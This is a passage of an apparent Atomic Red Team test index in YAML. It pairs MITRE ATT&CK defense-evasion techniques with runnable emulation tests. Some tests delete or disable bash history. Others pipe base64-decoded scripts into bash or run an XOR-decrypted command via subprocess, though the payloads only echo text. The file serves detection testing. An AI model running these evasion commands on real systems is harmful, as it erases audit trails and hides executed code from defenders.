attack-pattern--3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc created: '2022-06-15T18:00:04.219Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1070/007 external_id: T1070.007 - source_name: FreeDesktop Journal description: freedesktop.org. (n.d.). systemd-journald.service. Retrieved June 15, 2022. 
url: https://www.freedesktop.org/software/systemd/man/systemd-journald.service.html - source_name: Microsoft RDP Removal description: Microsoft. (2021, September 24). How to remove entries from the Remote Desktop Connection Computer box. Retrieved June 15, 2022. url: https://docs.microsoft.com/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer - source_name: Moran RDPieces description: Moran, B. (2020, November 18). Putting Together the RDPieces. Retrieved October 17, 2022. url: https://www.osdfcon.org/presentations/2020/Brian-Moran_Putting-Together-the-RDPieces.pdf - source_name: Apple Culprit Access description: rjben. (2012, May 30). How do you find the culprit when unauthorized access to a computer is a problem?. Retrieved August 3, 2022. url: https://discussions.apple.com/thread/3991574 - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved August 19, 2021.' url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-16T20:37:16.734Z' name: Clear Network Connection History and Configurations description: |- Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system and/or in application logs from behaviors that require network connections, such as [Remote Services](https://attack.mitre.org/techniques/T1021) or [External Remote Services](https://attack.mitre.org/techniques/T1133). Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries. 
Network connection history may be stored in various locations. For example, RDP connection history may be stored in Windows Registry values under (Citation: Microsoft RDP Removal):

* HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default
* HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers

Windows may also store information about recent RDP connections in files such as `C:\Users\%username%\Documents\Default.rdp` and `C:\Users\%username%\AppData\Local\Microsoft\Terminal Server Client\Cache\`.(Citation: Moran RDPieces) Similarly, macOS and Linux hosts may store information highlighting connection history in system logs (such as those stored in `/Library/Logs` and/or `/var/log/`).(Citation: Apple Culprit Access)(Citation: FreeDesktop Journal)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing) Malicious network connections may also require changes to third-party applications or network configuration settings, such as [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004) or tampering to enable [Proxy](https://attack.mitre.org/techniques/T1090). Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis. 
kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - CrowdStrike Falcon OverWatch x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows - Network Devices x_mitre_version: '1.2' atomic_tests: [] T1600.001: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--3a40f208-a9c1-4efa-a598-4003c3681fb8 created: '2020-10-19T19:03:48.310Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1600/001 external_id: T1600.001 - source_name: Cisco Synful Knock Evolution description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020. url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices - source_name: Cisco Blog Legacy Device Attacks description: Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020. url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:40.223Z' name: Reduce Key Space description: |- Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution) Adversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). 
As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key. Adversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/T1601) to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Network Devices x_mitre_version: '1.1' atomic_tests: [] T1070.003: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a created: '2020-01-31T12:32:08.228Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1070/003 external_id: T1070.003 - source_name: Broadcom ESXi Shell Audit description: Broadcom. (2025, February 20). Auditing ESXi Shell logins and commands. Retrieved March 26, 2025. url: https://knowledge.broadcom.com/external/article/321910/auditing-esxi-shell-logins-and-commands.html - source_name: Sophos PowerShell command audit description: jak. (2020, June 27). Live Discover - PowerShell command audit. Retrieved August 21, 2020. url: https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit - source_name: Microsoft PowerShell Command History description: Microsoft. (2020, May 13). About History. Retrieved September 4, 2020. 
url: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7 - source_name: US-CERT-TA18-106A description: US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020. url: https://www.us-cert.gov/ncas/alerts/TA18-106A - source_name: Sophos PowerShell Command History Forensics description: Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved November 17, 2024. url: https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:40.313Z' name: 'Indicator Removal on Host: Clear Command History' description: "In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.\n\nOn Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions. Adversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history. 
\ \n\nAdversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to clear command history data (clear logging and/or clear history).(Citation: US-CERT-TA18-106A) On ESXi servers, command history may be manually removed from the `/var/log/shell.log` file.(Citation: Broadcom ESXi Shell Audit)\n\nOn Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.\n\nThe PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)\n\nAdversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. 
Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Vikas Singh, Sophos - Emile Kenning, Sophos - Austin Clark, @c2defense x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - ESXi - Linux - macOS - Network Devices - Windows x_mitre_version: '1.6' identifier: T1070.003 atomic_tests: - name: Clear Bash history (rm) auto_generated_guid: a934276e-2be5-4a36-93fd-98adbb5bd4fc description: 'Clears bash history via rm ' input_arguments: history_path: description: Bash history path type: path default: "~/.bash_history" supported_platforms: - linux - macos executor: command: 'rm #{history_path} ' name: sh - name: Clear Bash history (cat dev/null) auto_generated_guid: b1251c35-dcd3-4ea1-86da-36d27b54f31f description: 'Clears bash history via cat /dev/null ' supported_platforms: - linux - macos input_arguments: history_path: description: Bash history path type: path default: "~/.bash_history" executor: command: 'cat /dev/null > #{history_path} ' name: sh - name: Clear Bash history (ln dev/null) auto_generated_guid: 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 description: 'Clears bash history via a symlink to /dev/null ' supported_platforms: - linux - macos input_arguments: history_path: description: Bash history path type: path default: "~/.bash_history" executor: command: 'ln -sf /dev/null #{history_path} ' name: sh - name: Clear history of a bunch of shells auto_generated_guid: 7e6721df-5f08-4370-9255-f06d8a77af4c description: 'Clears the history of a bunch of different shell types by setting the history size to zero ' 
supported_platforms: - linux - macos executor: command: | unset HISTFILE export HISTFILESIZE=0 history -c name: sh - name: Clear and Disable Bash History Logging auto_generated_guid: 784e4011-bd1a-4ecd-a63a-8feb278512e6 description: 'Clears the history and disable bash history logging of the current shell and future shell sessions ' supported_platforms: - linux - macos executor: command: | set +o history echo 'set +o history' >> ~/.bashrc . ~/.bashrc history -c cleanup_command: | sed -i 's/set +o history//g' ~/.bashrc . ~/.bashrc set -o history name: bash - name: Use Space Before Command to Avoid Logging to History auto_generated_guid: 53b03a54-4529-4992-852d-a00b4b7215a6 description: 'Using a space before a command causes the command to not be logged in the Bash History file ' supported_platforms: - linux - macos executor: command: | hostname whoami name: sh T1202: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e created: '2018-04-18T17:59:24.739Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1202 external_id: T1202 - source_name: Bleeping Computer - Scriptrunner.exe description: Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting tool to deploy malware. Retrieved July 8, 2024. url: https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/ - source_name: Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey Bot description: Cyble. (2024, December 5). Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey Bot. Retrieved February 4, 2025. url: https://cyble.com/blog/threat-actor-targets-manufacturing-industry-with-malware/ - source_name: Evi1cg Forfiles Nov 2017 description: Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved September 12, 2024. 
        url: https://x.com/Evi1cg/status/935027922397573120
      - source_name: RSA Forfiles Aug 2017
        description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe (if you are watching for cmd.exe). Retrieved January 22, 2018.
        url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
      - source_name: Secure Team - Scriptrunner.exe
        description: Secure Team - Information Assurance. (2023, January 8). Windows Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.
        url: https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/
      - source_name: SS64
        description: SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.
        url: https://ss64.com/nt/scriptrunner.html
      - source_name: VectorSec ForFiles Aug 2017
        description: vector_sec. (2017, August 11). Defenders watching launches of cmd? What about forfiles?. Retrieved September 12, 2024.
        url: https://x.com/vector_sec/status/896049052642533376
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:48:40.495Z'
      name: Indirect Command Execution
      description: |-
        Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106).

        For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (`pcalua.exe`), components of the Windows Subsystem for Linux (WSL), `Scriptrunner.exe`, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)

        Adversaries may also abuse the `ssh.exe` binary to execute malicious commands via the `ProxyCommand` and `LocalCommand` options, which can be invoked via the `-o` flag or by modifying the SSH config file.(Citation: Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey Bot)

        Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
      kill_chain_phases:
      - kill_chain_name: mitre-attack
        phase_name: defense-evasion
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_contributors:
      - Matthew Demaske, Adaptforward
      - Liran Ravich, CardinalOps
      x_mitre_deprecated: false
      x_mitre_detection: ''
      x_mitre_domains:
      - enterprise-attack
      x_mitre_is_subtechnique: false
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_platforms:
      - Windows
      x_mitre_version: '1.3'
    identifier: T1202
    atomic_tests: []
  T1140:
    technique:
      type: attack-pattern
      spec_version: '2.1'
      id: attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c
      created: '2017-12-14T16:46:06.044Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      revoked: false
      external_references:
      - source_name: mitre-attack
        url: https://attack.mitre.org/techniques/T1140
        external_id: T1140
      - source_name: Volexity PowerDuke November 2016
        description: 'Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.'
        url: https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/
      - source_name: Sentinel One Tainted Love 2023
        description: Aleksandar Milenkoski, Juan Andres Guerrero-Saade, and Joey Chen. (2023, March 23). Operation Tainted Love | Chinese APTs Target Telcos in New Attacks. Retrieved March 18, 2025.
        url: https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/
      - source_name: Malwarebytes Targeted Attack against Saudi Arabia
        description: Malwarebytes Labs. (2017, March 27). New targeted attack against Saudi Arabia Government. Retrieved July 3, 2017.
        url: https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2017/03/new-targeted-attack-saudi-arabia-government/
      - source_name: Carbon Black Obfuscation Sept 2016
        description: Tedesco, B. (2016, September 23). Security Alert Summary. Retrieved February 12, 2018.
        url: https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:48:40.925Z'
      name: Deobfuscate/Decode Files or Information
      description: |-
        Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.

        One such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows copy /b or type command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016)(Citation: Sentinel One Tainted Love 2023)

        Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.(Citation: Volexity PowerDuke November 2016)
      kill_chain_phases:
      - kill_chain_name: mitre-attack
        phase_name: defense-evasion
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_contributors:
      - Matthew Demaske, Adaptforward
      - Red Canary
      - Cristóbal Martínez Martín
      x_mitre_deprecated: false
      x_mitre_detection: ''
      x_mitre_domains:
      - enterprise-attack
      x_mitre_is_subtechnique: false
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_platforms:
      - ESXi
      - Linux
      - macOS
      - Windows
      x_mitre_version: '1.4'
    identifier: T1140
    atomic_tests:
    - name: Base64 decoding with Python
      auto_generated_guid: 356dc0e8-684f-4428-bb94-9313998ad608
      description: 'Use Python to decode a base64-encoded text string and echo it to the console '
      supported_platforms:
      - linux
      - macos
      input_arguments:
        message:
          description: Message to print to the screen
          type: string
          default: Hello from Atomic Red Team test T1140!
        encoded_file:
          description: File to temporarily save encoded text
          type: path
          default: "/tmp/T1140.encoded"
      dependencies:
      - description: 'Python must be present '
        prereq_command: 'which python3 '
        get_prereq_command: 'echo "Please install Python 3" '
      executor:
        name: sh
        elevation_required: false
        command: |
          ENCODED=$(python3 -c 'import base64;enc=base64.b64encode("#{message}".encode());print(enc.decode())')
          python3 -c "import base64;dec=base64.b64decode(\"$ENCODED\");print(dec.decode())"
          python3 -c "import base64 as d;dec=d.b64decode(\"$ENCODED\");print(dec.decode())"
          python3 -c "from base64 import b64decode;dec=b64decode(\"$ENCODED\");print(dec.decode())"
          python3 -c "from base64 import b64decode as d;dec=d(\"$ENCODED\");print(dec.decode())"
          echo $ENCODED | python3 -c "import base64,sys;dec=base64.b64decode(sys.stdin.read());print(dec.decode())"
          echo $ENCODED > #{encoded_file} && python3 -c "import base64;dec=base64.b64decode(open('#{encoded_file}').read());print(dec.decode())"
    - name: Base64 decoding with Perl
      auto_generated_guid: 6604d964-b9f6-4d4b-8ce8-499829a14d0a
      description: |
        Use Perl to decode a base64-encoded text string and echo it to the console
      supported_platforms:
      - linux
      - macos
      input_arguments:
        message:
          description: Message to print to the screen
          type: string
          default: Hello from Atomic Red Team test T1140!
        encoded_file:
          description: File to temporarily save encoded text
          type: path
          default: "/tmp/T1140.encoded"
      dependencies:
      - description: 'Perl must be present '
        prereq_command: 'which perl '
        get_prereq_command: 'echo "Please install Perl" '
      executor:
        name: sh
        elevation_required: false
        command: |
          ENCODED=$(perl -e "use MIME::Base64;print(encode_base64('#{message}'));")
          perl -le "use MIME::Base64;print(decode_base64('$ENCODED'));"
          echo $ENCODED | perl -le 'use MIME::Base64;print(decode_base64());'
          echo $ENCODED > #{encoded_file} && perl -le 'use MIME::Base64;open($f,"<","#{encoded_file}");print(decode_base64(<$f>));'
    - name: Base64 decoding with shell utilities
      auto_generated_guid: b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e
      description: 'Use common shell utilities to decode a base64-encoded text string and echo it to the console '
      supported_platforms:
      - linux
      - macos
      input_arguments:
        message:
          description: Message to print to the screen
          type: string
          default: Hello from Atomic Red Team test T1140!
        encoded_file:
          description: File to temporarily save encoded text
          type: path
          default: "/tmp/T1140.encoded"
      executor:
        name: sh
        elevation_required: false
        command: |
          ENCODED=$(echo '#{message}' | base64)
          printf $ENCODED | base64 -d
          echo $ENCODED | base64 -d
          echo $(echo $ENCODED) | base64 -d
          echo $ENCODED > #{encoded_file} && base64 -d #{encoded_file}
          echo $ENCODED > #{encoded_file} && base64 -d < #{encoded_file}
          echo $ENCODED > #{encoded_file} && cat #{encoded_file} | base64 -d
          echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | base64 -d
          bash -c "{echo,\"$(echo $ENCODED)\"}|{base64,-d}"
    - name: Hex decoding with shell utilities
      auto_generated_guid: '005943f9-8dd5-4349-8b46-0313c0a9f973'
      description: 'Use common shell utilities to decode a hex-encoded text string and echo it to the console '
      supported_platforms:
      - linux
      - macos
      input_arguments:
        message:
          description: Message to print to the screen
          type: string
          default: Hello from Atomic Red Team test T1140!
        encoded_file:
          description: File to temporarily save encoded text
          type: path
          default: "/tmp/T1140.encoded"
      dependencies:
      - description: 'xxd must be present '
        prereq_command: 'which xxd '
        get_prereq_command: 'echo "Please install xxd" '
      executor:
        name: sh
        elevation_required: false
        command: |
          ENCODED=$(echo '#{message}' | xxd -ps -c 256)
          printf $ENCODED | xxd -r -p
          echo $ENCODED | xxd -r -p
          echo $(echo $ENCODED) | xxd -r -p
          echo $ENCODED > #{encoded_file} && xxd -r -p #{encoded_file}
          echo $ENCODED > #{encoded_file} && xxd -r -p < #{encoded_file}
          echo $ENCODED > #{encoded_file} && cat #{encoded_file} | xxd -r -p
          echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | xxd -r -p
    - name: Linux Base64 Encoded Shebang in CLI
      auto_generated_guid: 3a15c372-67c1-4430-ac8e-ec06d641ce4d
      description: |
        Using Linux Base64 Encoded shell scripts that have Shebang in them. This is commonly how attackers obfuscate passing and executing a shell script. Seen [here](https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html) by TrendMicro, as well as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS). There is also a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml) for it.
      supported_platforms:
      - linux
      - macos
      input_arguments:
        bash_encoded:
          description: Encoded
          type: string
          default: IyEvYmluL2Jhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
        dash_encoded:
          description: Encoded
          type: string
          default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
        fish_encoded:
          description: Encoded
          type: string
          default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
        sh_encoded:
          description: Encoded
          type: string
          default: IyEvYmluL3NoCmVjaG8gImh0dHBzOi8vd3d3LnlvdXR1YmUuY29tL0BhdG9taWNzb25hZnJpZGF5IEZUVyIK
      dependencies:
      - description: 'base64 must be present '
        prereq_command: 'which base64 '
        get_prereq_command: 'echo "please install base64" '
      executor:
        name: sh
        elevation_required: false
        command: |
          echo #{bash_encoded} | base64 -d | bash
          echo #{dash_encoded} | base64 -d | bash
          echo #{fish_encoded} | base64 -d | bash
          echo #{sh_encoded} | base64 -d | bash
    - name: XOR decoding and command execution using Python
      auto_generated_guid: c3b65cd5-ee51-4e98-b6a3-6cbdec138efc
      description: |
        An adversary can obfuscate malicious commands or payloads using XOR and execute them on the victim's machine. This test uses Python to decode and execute commands on the machine.
      supported_platforms:
      - linux
      - macos
      input_arguments:
        xor_key:
          description: 'Key used to decrypt the command '
          type: string
          default: waEHleblxiQjoxFJQaIMLdHKz
        encrypted_command:
          description: Encrypted command that will be executed
          type: string
          default: AAkqKQEM
      dependency_executor_name: bash
      dependencies:
      - description: Python3 must be installed
        prereq_command: which python3
        get_prereq_command: echo "Install Python3"
      executor:
        command: |
          python3 -c 'import base64; import subprocess; xor_decrypt = lambda text, key: "".join([chr(c ^ ord(k)) for c, k in zip(base64.b64decode(text.encode()), key)]); command = "#{encrypted_command}"; key = "#{xor_key}"; exec = xor_decrypt(command, key); subprocess.call(exec, shell=True)'
        cleanup_command:
        name: bash
        elevation_required: false
  T1562:
    technique:
      type: attack-pattern
      spec_version: '2.1'
      id: attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529
      created: '2020-02-21T20:22:13.470Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      revoked: false
      external_references:
      - source_name: mitre-attack
        url: https://attack.mitre.org/techniques/T1562
        external_id: T1562
      - source_name: Google Cloud Mandiant UNC3886 2024
        description: 'Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert: Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024.'
        url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
      - source_name: Emotet shutdown
        description: The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.
        url: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:48:41.123Z'
      name: Impair Defenses
      description: |-
        Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.

        Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
      kill_chain_phases:
      - kill_chain_name: mitre-attack
        phase_name: defense-evasion
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_contributors:
      - Jamie Williams (U ω U), PANW Unit 42
      - Liran Ravich, CardinalOps
      x_mitre_deprecated: false
      x_mitre_detection: ''
      x_mitre_domains:
      - enterprise-attack
      x_mitre_is_subtechnique: false
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_platforms:
      - Windows
      - IaaS
      - Linux
      - macOS
      - Containers
      - Network Devices
      - Identity Provider
      - Office Suite
      - ESXi
      x_mitre_version: '1.7'
    identifier: T1562
    atomic_tests: []
  T1055.003:
    technique:
      type: attack-pattern
      spec_version: '2.1'
      id: attack-pattern--41d9846c-f6af-4302-a654-24bba2729bc6
      created: '2020-01-14T01:28:32.166Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      external_references:
      - source_name: mitre-attack
        url: https://attack.mitre.org/techniques/T1055/003
        external_id: T1055.003
      - source_name: Elastic Process Injection July 2017
        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.'
        url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:48:42.433Z'
      name: Thread Execution Hijacking
      description: |-
        Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process.

        Thread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as OpenThread. At this point the process can be suspended then written to, realigned to the injected code, and resumed via SuspendThread, VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Elastic Process Injection July 2017)

        This is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) but targets an existing process rather than creating a process in a suspended state.

        Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process.
      kill_chain_phases:
      - kill_chain_name: mitre-attack
        phase_name: defense-evasion
      - kill_chain_name: mitre-attack
        phase_name: privilege-escalation
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_deprecated: false
      x_mitre_detection: ''
      x_mitre_domains:
      - enterprise-attack
      x_mitre_is_subtechnique: true
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_platforms:
      - Windows
      x_mitre_version: '1.2'
    identifier: T1055.003
    atomic_tests: []
  T1036:
    technique:
      type: attack-pattern
      spec_version: '2.1'
      id: attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0
      created: '2017-05-31T21:30:38.511Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      revoked: false
      external_references:
      - source_name: mitre-attack
        url: https://attack.mitre.org/techniques/T1036
        external_id: T1036
      - source_name: Twitter ItsReallyNick Masquerading Update
        description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved September 12, 2024.
        url: https://x.com/ItsReallyNick/status/1055321652777619457
      - source_name: Elastic Masquerade Ball
